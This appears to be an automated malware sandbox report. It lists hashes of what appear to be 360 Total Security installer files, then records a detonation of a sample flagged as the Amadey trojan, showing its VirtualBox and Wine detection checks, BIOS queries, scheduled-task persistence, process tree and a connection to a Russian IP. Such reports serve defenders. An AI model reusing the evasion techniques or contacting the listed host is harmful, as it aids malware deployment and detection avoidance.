SHA1 6036d5f882e7e189859e58fbbd4421a2b09b58dc
SHA256 48b9596b3c7b1af2c0c5cd62a815f7e43deac03ae3e91da26e8dec2891c915be
SHA512 76d2235e29a906c8973374d2ec3cb549222d431695daf6ceda2aaeee95fd5bb35dd57d53a73d9a7be04fe38d10f81eee398bb81bf3c104bd0fc17e871d081a60

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\360DeskAna.exe

MD5 9c914da5ba91ec1854effa03c4ef6b27
SHA1 a2dfc7d70b5fedc961b0bc6126962139bc848ea3
SHA256 f78eee64134aa2fca1d6eecaa8ad2c3bf9e54c232554525ac4783768daa677e1
SHA512 266efe7361a4226a5fcf81fd11ae96f7131e8911adf6955423bf054d825c210b634bd1a2ac2f112c5b85fda9aa1b9ca07e3646179bf9977724bc5b4e9e7dca42

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\Utils\DesktopPlus\Utils\360searchlite.exe

MD5 85f76a8481c642654ae58caf6d1b35a0
SHA1 5925a1f3a265311e8d818407062ddf5cefffac3f
SHA256 81399a7379aebbbfbce8d8cbc2d482ca04c38ddc91919ae5c6ee3a0f8fb3ea9b
SHA512 7da2f2550b4bcad5a5df5033c44635722724ed68fe97fa9e383032432283ac43e3dbeb0f4080368f86d2e2b54b91a166f5e6280c35f0ae7e8af3e31c478fb48d

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\Utils\DesktopPlus\Utils\360ScreenCapture.exe

MD5 050132ace215b38e8311e8f3fc11a6f2
SHA1 ccaecaf99d9b8acafd1632e3735b89d567af5112
SHA256 234184ee1c37f28ef75a950501e91d6b55c829f66b96696a1a8e83a09bdbe883
SHA512 21b4d364a3ea965adf7a697f70f64ad6ca660bf0bc6a664dec00918d4529bf647b36e2f3268ec0f59d7b51f3b6c55d573d45ec2026849dc51b376dc59f59e736

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\Utils\DesktopPlus\DesktopPlus.exe

MD5 8d3770e61a182b02474f542ae09b8f8e
SHA1 db07c20f71f9a130d23d6b53bdd0af7530b0ac45
SHA256 69ea2ac14efc0366c7f436717aa3d8ab746059feee182241bbdeaa520e4ada56
SHA512 dbf5def89d3f2f62f60df19340f749053fce129d682f33607a8e5dbf7ad30d9bed3b3fb9ae8173365b0264682f55860d32ff91b2dc0b45319df7c62a5090bc13

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\Utils\DesktopPlus\DesktopPlus64.exe

MD5 ea25a54925150897816145844d0c3c7c
SHA1 f49382afc4ef4aec3180e562c4f9070cf465899f
SHA256 1cefd27a2795ed2ec71dc4760b6834cad97211685f2906db82240bf712227440
SHA512 9771a7eea4d11d9ec704c555dfa54aab7b186f3991ef99ee30142d353809c79aae92e2be78bd517c2ee72d40e46a58b5ad5c954cd86bca30f50f7549ba7f4569

C:\Program Files (x86)\360\Total Security\Dumpuper.exe

MD5 bf7d946721599d16e0fa7ef49a4e0ee4
SHA1 74c6404d63ab52aad2e549b8d9061ee2c350ac5a
SHA256 5f21575642ecf7d38be30aef50be623f74dc3644603e0cb48d1b297ae2066614
SHA512 dd8b5e8233033a3ddb30278b2b82c60925bbca63edb68aa1e23c0a6a8f0dd8da21f60846c747fea83be7ed1e99ed86379ffff7b6aefde5ffbb85e3f98732725f

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\360Base64.dll

MD5 115ba98b5abe21c4a9124dda8995d834
SHA1 5dd5cae213a9dbe5ea7729c1d2acd080f75cfa39
SHA256 80765adb886050b0f87e30fa62336985db67c09b25f4d1760194a28ff78899d7
SHA512 1c415c07dd59ef00c7bdcef35ac8fdeea88b6f482d266cc12bab3d4d3005a76eebbe97d06e5282e1dbe940ab2971ffdcbd0db2cd1d700c33805cf1831efe1a3d

C:\Program Files (x86)\360\Total Security\360NetBase.dll

MD5 14c6b4bbd31f6fd13530bc941cc71d1a
SHA1 ce4e38ac82a54f64d318507ddc28f9ffbb378f0f
SHA256 401d8529a84f1d80a439be8cd4e869202162458e5afb5e5bac97c4859bfe8eb5
SHA512 c16d525f1d3fc098b4d6c8b8a872a9013ef2f945f27af73ed7826f61a2b80d756ae5348105432909eccc71f03834cd1301f87fa5a0107e0c7137f5c8e3a3cc95

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\360Util64.dll

MD5 8b14a80d926ffdab593b6bc0b002b9c4
SHA1 c84c938543ef6d2c42ad0c61f970e3d1ccb3be44
SHA256 669a13733ce62edac298f91f957ebc7c748918d07c7730e94fd930d6141f8078
SHA512 d049f415db5dc5c38a968251e72930a8a90e126617f514b0566f203435ab8f1e96371c2c8f0f40cc60dbcd48b284bf46369d377eb4fa61e4fec6def054bbb744

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\CrashReport64.dll

MD5 f0ec259bc74b69cac5789922187418b5
SHA1 99e738a12db4a60ee76316ad0a56604a5f426221
SHA256 09eafeda04f79fd1faf273efe104e877b719fb31689838aa12a3e6d3384a3da4
SHA512 630cf0a30961af6d41d24f2d2fc81e0c10c99e19241aff7e14aa38317eebbe01e5d85c1cb5848ecfd7b75e2fe762cf4a07fee781d052b48f0a3c15a37505dac4

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\Sites64.dll

MD5 4bd489f48461de0098f046eeb0fcfb1e
SHA1 047c39f1b52602eb19655c4ce42d67e8aaabeb9a
SHA256 e751410539c790554ef7e3f198689b61ed06955a608dc1fcb392bb4b7fe522c6
SHA512 a97929d19b9fba341bc52bb96eea0c97a952f3ed2e6cf233cef9b38b3fd678f0b85c1703fe4c0d6f9c6ca3e6577716e564f92e9b36f7806ae0f5dc3c15f9caa8

C:\Program Files (x86)\360\Total Security\sites.dll

MD5 d43fa5904a62445893fe1db320ff2e7b
SHA1 2f888949e9c3ce0f647b97ebc8289ae3f2f2eaae
SHA256 074f19878542b07060bcf7a10238aac2571eda75f6596fed6a0a1f7e884f2305
SHA512 1589551e1b5f2c8794f56543eb472c1a801f6dd6b338ffe406bf91bf39061a9022fe13c9a460589a42f243f5329193ff2ae32b1112252fc78d0321c68313b34c

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\ipc\360hvm64.sys

MD5 37ef2ad85bca66cf21af216ab4e35707
SHA1 1569cb84354ed47f97844833807ed5a07dc5df92
SHA256 77faaf6c67ab95db1615275410d2dd611208fce0e80771bd009cf0f8f98cf74e
SHA512 e2b85223b86b8c339a2794f3e30f601c877107c5a7555ea33c173e6a79c3626a623283249d8a62fb405fdfd54ec4ebc802977d74533d8fe3ef41fd97d231b035

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\deepscan\dsark64.sys

MD5 b498f27ca312db96a0cbe6b7405b2027
SHA1 d35c9e5bcb3df23855130b783ea80fea8653a097
SHA256 34257623c1c563abf99085b4c483a672945bd6059009eb001266f003f315b356
SHA512 42d6315047d76b43bd2187f45c2f68182fa2b0e803be8989417e8637c1172391d00c0b3a9b6227852bd4d31a72a661a19e074e163ef04ba2e031b2b4df942586

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\safemon\WscReg.exe

MD5 c7dbfd0d17929c83f12080eb4680595f
SHA1 210f608a7929bf4085815522ffe2695063125e69
SHA256 a628b37df526093026862a1180484beece436b5dfba83648551fe57ce9a5dd75
SHA512 7d8d5b387cf65920e7a1f2aa7c0ce111eb5d600fe69ec48c66f3bf05c870dad0e34d9637b1852af0f379495bc3ebc277d130d14701e2b4114f8d50bab057c5f3

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\deepscan\BAPIDRV64.sys

MD5 992de18c7b0d80d7b8531b90c3910888
SHA1 173c5c2afa64ce8b8d2243b5baa5d4a77c996e17
SHA256 edde2232716629c09ebbf6a5ddfe55fc8bc2edef91ccede9104b3186ffb170a0
SHA512 98346c390d9b64360c70b7c5780efb62e856f03e19d58fff433461cf5a2d833fea847267db1b72cf4103e9270f56b11ec542b15fc46e4a01233b8327a6878936

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\deepscan\BAPIDRV.sys

MD5 b7b91b32156973711fdba826e2fed780
SHA1 0caaa4c4b12801ea1dcfbc9bb46b5cc49cf74c2d
SHA256 2d7fa3af97a50240dec7540e4171772912d1dbb82259ac4acf039818417cde5d
SHA512 8ad87c80012fe9645514df956a22aee79749feac87b199c4a89f030544a49bd5c51148df02885a794d20056bef6091947c3bb61dfe60bcabad71e3969a249967

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\deepscan\360FsFlt.sys

MD5 b372e31c719a47b08fe4d377d5df4bde
SHA1 ea936fa64b8d11fa41825f07c2ceeb886804956c
SHA256 8d21a430b38d74157f5d73f8dfd4d508c2fff7f2945fa2987794f656b3acb58c
SHA512 fc2962127bb84aff61239fefc060c002edb6560e11a5e7d2d0dd6d15a431200eb5ac988867988ddd84fd5da241f6bc4a1319ffa83cc9ce7d5691e7e5c4170625

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\ipc\360Box.sys

MD5 feb5d9ad5a6965849756344f9947a772
SHA1 5e24761e4e5b7d6c116c0146ded4851db55c8f7e
SHA256 f3f3faa4a6ba4e81271e25e99badf4318b84637784d563a84a017c5f46ce291e
SHA512 3110f5a76e5967942348bb13a669ff03c21beb9c62405c552b530eec8060a9b304d76f990ff8c4cecf67a4d1f66e6a32a7388a951036fa641fa98679c302b9a0

C:\Program Files (x86)\360\Total Security\filemon\AVLib.dat

MD5 e3bcd970502ec0d7ebb03bfb2c4a3bab
SHA1 5da1058a0be57b048a2c1b3442de44c576a4c913
SHA256 2265a0b291d07eed46ff162f10dda492aa62aed8ea8b5b6146cc995e15dcbab6
SHA512 b5fabe8a300baf6b3535d19091438aa7ce647db286642c9e1a8635fc11ecf488eb6f2b5734a01a3072fe5fd7a16185d2272a51f657a4bd78c0ab8fff9516709b

C:\Program Files (x86)\360\Total Security\filemon\AVCheck.dll

MD5 0fc2f13d9e0cfbd4903a77051348d16a
SHA1 c1df2fe56cbd15271020e48751c39ab482f6eaca
SHA256 7b79ca1ec9ea05d6549218af8c646f8cb25c563e66d810ca8890340066cff72b
SHA512 6977514116a2fa2c0a884b46975cfa048d966448e493c1415467d6be8719c6b40db0181a861f9e0ef53aa90a3b04012e02e6aecb70230745c487355170416efc

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\filemon\360avflt64.sys

MD5 12426837392e278838d1501a5f324398
SHA1 3be22df43e2bce3690c92188a76fa33a8a581d69
SHA256 4fb3cfbf91bc27e867d8f58081ffd3be361481e2270627825cdfd13eef50ec1d
SHA512 28ced26c8acbe9177ff01fb24d7a8abb34f37a0748824508f86a75b162f17371f02318eeae4f27ed183143a22af01c57d074f3b444621209d573aa323071c7f3

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\filemon\360AvFlt.sys

MD5 86d92ff1f211f9704d0a5ee744dc5c5e
SHA1 21120d96da72b7a592dfdbe918e2dd8656f0cd2d
SHA256 79eb282821aa728f0fdfdb07a1fba273af83768614e026bc8e371655e398bd50
SHA512 b547eaa0b43ccf1af913c94ac7831edaf45d15428fd017d8f41cb8942156a453c381d4526a0b51f343093f854b4c5fdb716bdaa366101ce652cdeeb83f5de2c9

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\MenuEx64.dll

MD5 d569954dc1054b6e7d3b495782634034
SHA1 dfaf57da05704261aa54afaa658d4e61a64fa7f2
SHA256 11294e063fe9a5d5b6019a39b48bebb75f536e27ff92008c85e9357c95805b80
SHA512 b12e2a6cfe849b5df21295f4a538db0381f2fb8c63b8b4dfca9778af16c68d23336140874a64deb324e39da0ac52b1f2292812fd02967d415319ade1ee965b6e

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\MenuEx.dll

MD5 273c2d00588d203a9f1486cabacc7c57
SHA1 cd7782e5836d645b2244bf30fe91c79fdcfc86d2
SHA256 d14d7de52c5749549a17e7614bd3df8278e8595ffca4110e6289c56a21eea6dc
SHA512 6cf37c151a21447ac35638af22f6324ed0c10df736e5e54be279b5db8f68da86d85ef6fdfa3b4a22b2ccecd98dd37abdc93b9e8f391a3a90deb1e4e4990c1779

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\CrashReport.dll

MD5 94a08d898c2029877e752203a477d22f
SHA1 d8a4c261b94319b4707ee201878658424e554f36
SHA256 07ed1d3443e7f9b2531aaa0b957a298ea6c5c81bcd321e7faf25a17a85063169
SHA512 79a2e121665e403767e5278bdbac6c52f6ce048d0c3968a2fb5053229c5d98e9275acbc48806c45b8bc2e807f6e52ee4dad54924b758db8328fb262c6fd176b6

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\360Util.dll

MD5 d9a8493f1ce7b60653f7fb2068514eff
SHA1 c8c0da14efeb1a597c77566beed299146e6c6167
SHA256 77cee2e41fad67986c6c6e1426bc6bdaa976b1dcd3b24f381376b201d201581c
SHA512 0b500630e13aefba621c0f66aef5f2528c0fa0c91deaf19e92999c6377908f53f3a6b23fb90723b890155877ab7b8b40eacd851794b23ff213cc33013734415f

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\360TSCommon64.dll

MD5 40e115b8b079bead649964fccab4b2a8
SHA1 e2a80de5244ebf4007de8a74cd0003055ce87656
SHA256 a4a6473251bcfff7944d7b23f823dfdcb150a7353b1f2a54e20a3e2fbaf03e07
SHA512 b73cc36bc808ce2c1c3280205bf848a51faefe07671cf8a6e6bb7e91fa26522069a82ddee3fbf68a3e89318b1ba0a8784b1a4efce9d163c606033e78919b2db4

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\360TSCommon.dll

MD5 fd9ec3f6ae3ec4e72c7d8adb9d977480
SHA1 304b83eb514354a86c9b136ac32badcec616fed8
SHA256 deddae3c60a724e167107cda7d4ad0481d8ab451f61081eff7730d0f114da918
SHA512 22a47674c2000c175594e8b9f95d23665481a2f2c84f8870a4ad58095aa107b9a0ba61a5315ebdfcd1ec6a4b3031bb3e21ee6e2624d57daae20c587592cce5fd

C:\Program Files (x86)\360\Total Security\360NetBase64.dll

MD5 869470ff4d2d3dffc2ef004a208fa4ac
SHA1 98b2e5b7240567b046b47021e98c84702a39347a
SHA256 ab52fff1840b010a1e6be5e432c44ca0aa2857d5da3df6574fc0fbc0004edc7a
SHA512 f7994f656fc52d5c9ff24d7746d7b36da6a749bdfeb06a24b17cb762e50bff1fbc9f4ae3e4ec884b81776905c870e70cd8fe326b2f3d21a3d1a866b274f369e2

C:\Users\Admin\AppData\Local\Temp\360_install_20240514013802_259487273\temp_files\sweeper\360FastFind.dll

MD5 05a04412b0a86f848eb92a97e81f3821
SHA1 a6495836bb9915eec2c559077a44861d2c5c8182
SHA256 45a9d2180bc3a6c5716a5ccbf74b14d9e91fa706449aae4046c0835cc672f5e5
SHA512 9074ac8882bcecafe4726ebe9625b57ec4410cc2f9a8293462287c76f0904b1b9d4ac181edd99a3e525a36b307497b3242390fe19d41ed2420b3d70682e67244

C:\Program Files (x86)\360\Total Security\deepscan\BAPIDRV_old.sys

MD5 98ee79b8e82c1da453c71a6f9380d128
SHA1 7e9178bab13a14b4b5567994ada35d13fdb2b1be
SHA256 dc346a2acb7a340a3ebfec2ac684254defb66f5485726d0ef32b51a3247fab83
SHA512 60b4b163a4579af0e39f594b1fafdfca09cd7cb99c598cc708e841be3ac13ca56d1c6c2a760119060f82191e26819e6028ca4bd76cc25008a476f6b24e11acfc

C:\Program Files (x86)\360\Total Security\config.ini

MD5 33eef414228b89e0e4be1ab6f716c7ac
SHA1 a8866ae2ac854a8477815ccc5739d9e05e43c127
SHA256 ab9a7fb7c89788bf20d7161eaa584ddd6428abb4c1bbd7acff57bb1f3011968f
SHA512 094f98b136a1df8706453be33f5ddb6b5ef35f734f6b05dca7bbb79f29121b824b28ab6087ac4472b38c55408ab8c840ea4fbbfe2f6875fb723510f38259f996

C:\Program Files (x86)\360\Total Security\ipc\DrvUtility.dll

MD5 bc8917f469a0e356c015ad6a31acc134
SHA1 a2e0fbcff53018ed92754065beb0a16e35339cf3
SHA256 4f798cf1e27dd355709c4ebe11a24b17ee832b4051f8952d9ae12942e0ccc5a9
SHA512 f9039ea609c18174dd76f5a89b6af4908573fe194cfaf412430c755da0626dce7b92f668e5cac6b195c91f17cc4eaf4ddb963b95bc6de7483c05436f7f4f59c8

C:\Program Files (x86)\360\Total Security\ipc\360Camera64.sys

MD5 d85dac07f93d74f073729b89dc339251
SHA1 e628f85f1365d9164140391cb93a2b22a4fb8ba4
SHA256 5b64447141ffe714f04a4ae489dac020b5ca0c31011c8edcc22da8cbfe265256
SHA512 896aeee641e5ad5df74c16ae8bed9c0f9ef53034c391b47e5c99540a3da58bbae9524f0bcebfa93f395b7b6e6a0ad1100e27f19d05c796abb1da6660a3b35da2

C:\Program Files (x86)\360\Total Security\360rcbase.dat

MD5 fae24f818a5721a020be0c6cccde118c
SHA1 8480eab0734e8a3401666dfb9afc392a253338da
SHA256 01d6c6cdae2f16aa0f502b6c03e2db4b21b56b55599f2223e3eea2b6129ca17c
SHA512 f9ec5f1d81981410592a2b77be30eb40bb7b9f1702368bad69ed8535999b496a604fb522af4cbc8eb840049a7cc814ce96d5e4e979b4335e396503a93fbe53c2

C:\Program Files (x86)\360\Total Security\i18n\en\UrlSettings.dll.locale

MD5 627cbb9d1671cd7a553cb9e59e765bbf
SHA1 4a4916f14c4ca7d26dac88ff4a5884761d8c5a70
SHA256 063e660b1e32cbaefb8b928f1fa638853bbcb6b996bb08496fc861fc5425a840
SHA512 cfe0246353d9670ac7d77994633e8c55aca4a3ecc889c52d09949e427d5e5e06056678de15ecc3017af81ca6ca1333f624f8652a7488dd4e317c6a46c8719237

C:\Program Files (x86)\360\Total Security\I18N.dll

MD5 7e181b91215ae31b6717926501093bc4
SHA1 8fcf05c9ac64c46c87acc1ec67631e7b66363d9e
SHA256 239824a487ae786daadc9e556c185561378f47ec7ba6b216c17242aea3a78ff9
SHA512 0df684bdd9c0a5cce81db692e336dcf3e8c8aec80d5d6fb8620227e2f31d5bfd1d63f9cb7f808cb9511fe483e7798fa6d5a51c0bb1ec3c3c86400767a17a155f

C:\Program Files (x86)\360\Total Security\QHVer.dll

MD5 f879fe6c613f66bec8b0d3510d4b1016
SHA1 664682661053f1ecae0c333e2c568eb6c02f848b
SHA256 f9dd094692d00aa5a6247a7e2074934ca687251127a9d7105222b8a3131fd978
SHA512 8b200cfc70ef239029c808433f943fae02f57b6b31ae762d65473e3d265b85e3b15bf9420e46056aeae43323fde733bbab693af577127fec671a53733c6e1e54

C:\Program Files (x86)\360\Total Security\filemon\360avflt64_old.sys

MD5 f14d2b6d2d2028ca0851a604cd69c408
SHA1 54fb598af2f9ec109973085322e5b79254856560
SHA256 167b31798b2bec91bb60eb64f50300a0c5e1605203349817754c6be161a84539
SHA512 9dda7ba6c320f7dec35bb118c792fa6c56ec5c32610f7d93776f4bbb0a031be5a7394cbe8931608faece0a855a26e927b2ffffcdb005be6751e07add4f19b49b

C:\Program Files (x86)\360\Total Security\filemon\360AvFlt_old.sys

MD5 e855e9039f37523e6b01e05107cefeff
SHA1 c0882da58826de9fb9bc95c929a73fb71735fd78
SHA256 3b81711731e79ea45c3545b599f3ebc21ced95f608694332892c918e6b2faa17
SHA512 c3c56ec6a31f9c0a49b195b2e503659c61b47cf556747ebaffe6fb9f8880a8bebae84ba12a749ad0191087bd3e843ed99c1ec74f51744a3743705dbf46c9c325

C:\Program Files (x86)\360\Total Security\deepscan\dsark64_old.sys

MD5 a4c68afa8fca59190ab429ae631399fd
SHA1 2a4e3d62661e564468e4dfb99761de099434e3e5
SHA256 11be27f2ba0af548e2fd5ad7baaa5ac3e10b928b0742680ab9f673d1ebf31521
SHA512 2e3d5381649b8cb97179751963b572ff4f828d581b1e87df0cedf5ed51f76235db0ba4e78087562ac6f9f02f805b9ecafdba53a1b4572363829211643d4f8fef

C:\Program Files (x86)\360\Total Security\deepscan\BAPIDRV64_old.sys

MD5 92250774eb2f9dd1316fc5dca5a1d375
SHA1 df62deaf0a9eacdd74b6ab1c03767a4cb7af9221
SHA256 6edb05bc886e30adba4164cc852eb089630d936f106a5a29f4d30727f1a6535a
SHA512 bf68a4955cc09d20380736bb78b16f15ac85a6beb6af5065a640d7545707f573a17a5aa0f6664a2b8f2cd7bf0cceb186f885210c8a07fc5d185c030d01793fd1

C:\Program Files (x86)\360\Total Security\deepscan\360FsFlt_old.sys

MD5 cd20d1dd4eab42c47d1ded235f97329f
SHA1 a4a21345c840854e3798a008d244db53217e42d7
SHA256 4df4e20bd4062e8971d85e8145b0b91b60922ec9f007702ba2b81d08029ba8e3
SHA512 67ca599dda7c69fb1220265e913b5b6456c36a67f148e7d58fb7c78e20afad92ca4e628ee9e484de91235c898e855d96edb93ad186099753317585fc20e3c01e

C:\Program Files (x86)\360\Total Security\ipc\360hvm64_old.sys

MD5 f93fa692aa3658422997643f51c1b7d8
SHA1 d00ddf850a7f937d1a75c401227a70fd80718171
SHA256 3c9da5ab28427405bf1099c1e7c3e77683c658c0c7c5fc458f606f368e7c6fc6
SHA512 b30b87b49f0155f2e310730a71e39de041b74d2aab53215089fc61be700854d5576c540eca34da774c358fd89e516204be14519576e2946a05b1f90318659745

C:\Program Files (x86)\360\Total Security\ipc\360Box64_old.sys

MD5 69c04d5da61c59c89bbd36cbaa13e9ae
SHA1 0369967f432d623a1fad7c5c1a7405104faaba44
SHA256 23283e2c2bd6ccb04436c90037282dd103bc8add9bc62e9f5d34842e2e336b11
SHA512 3bfabad5b72eea44af705a3c482e7496e6a1547e0ddd429740a6d69e81895a651c87ea3ce6b53ad0ab6f2df331516ea80bf1ae47b02d6becb01e4d9f51ae4024

C:\Program Files (x86)\360\Total Security\ipc\360Box_old.sys

MD5 df38750f3f3e205e8795724d970189ea
SHA1 442952863db2e6466ec9ca116b1ce85876100a89
SHA256 5d90f8287ad1ccbc6e6c3c656b1a84467c50801590d8f730c10b0d106532294c
SHA512 9311928c6193f11ba3778b546e0081062998b9da4356529a341971cb343af0adeaef8e4099adcf4dc8905b68dbe8cf86d43cbb2690d64d328c21631803540b4c

C:\Program Files (x86)\360\Total Security\ipc\360hvm.dll

MD5 e540bc23b3f5934dee4d7b7b39fc3ac2
SHA1 465f0b0e4fe49b81a43980dd0cf40e068e98abed
SHA256 e794c636a50b5f51e0bd233c59c9144277a94792d3537460123a39c583d01421
SHA512 39412ddea1f7b16ae1b6d89db7f7c24b92b1b310f3d9191ab82bfa01283044d3c4e991a5fd4efee98d00c1e65d76328bd396138e5dfc90f44ed49ed605f8e764

C:\Program Files (x86)\360\Total Security\filemon\360AvFlt.dll

MD5 da5e35c6395a34acaa5a0eb9b71ff85a
SHA1 5da7e723aaa5859ab8f227455d80d8afa7696e22
SHA256 5e11c25e4d6e146c5e10fcbc21b2cdb5e97ec47f25c416e5d263985f3d964172
SHA512 49660339594abff9b0590bc3f401634a514834cf98fa8715b05a57a3cea575d74859681984d8c2c601d5fe947701f8f110450fac764a5d32096e24d7eadcdd2c

C:\Program Files (x86)\360\Total Security\ipc\360AntiHacker64.sys

MD5 0e93f09b4e51c6a8a66cd1c9ceeb8ff3
SHA1 b868b7f8fd150cdd3b5d569738154e62350aef5c
SHA256 66152d1316b674a95ee0bd63844e6acb5a709a177934814aede80166bf2bc204
SHA512 c5b9f574d83f81b58147056f94ba82deca63195a2454db6f5196057e91d3e7fac15c94951c4e7bb14d3f2aeb2a2eec4230594646c27280abab58df3f9e4ef239

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-14 01:35

Reported

2024-05-14 01:38

Platform

win10v2004-20240508-en

Max time kernel

142s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\axplons.job C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe

"C:\Users\Admin\AppData\Local\Temp\b5875159e53c5a639ef41560de62a7601773c1eb36ef271c6b88b46224f5cd89.exe"

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,1999448010053300448,1112699187621658374,262144 --variations-seed-version --mojo-platform-channel-handle=4004 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
RU 5.42.96.7:80 5.42.96.7 tcp
US 8.8.8.8:53 7.96.42.5.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.179.89.13.in-addr.arpa udp

Files

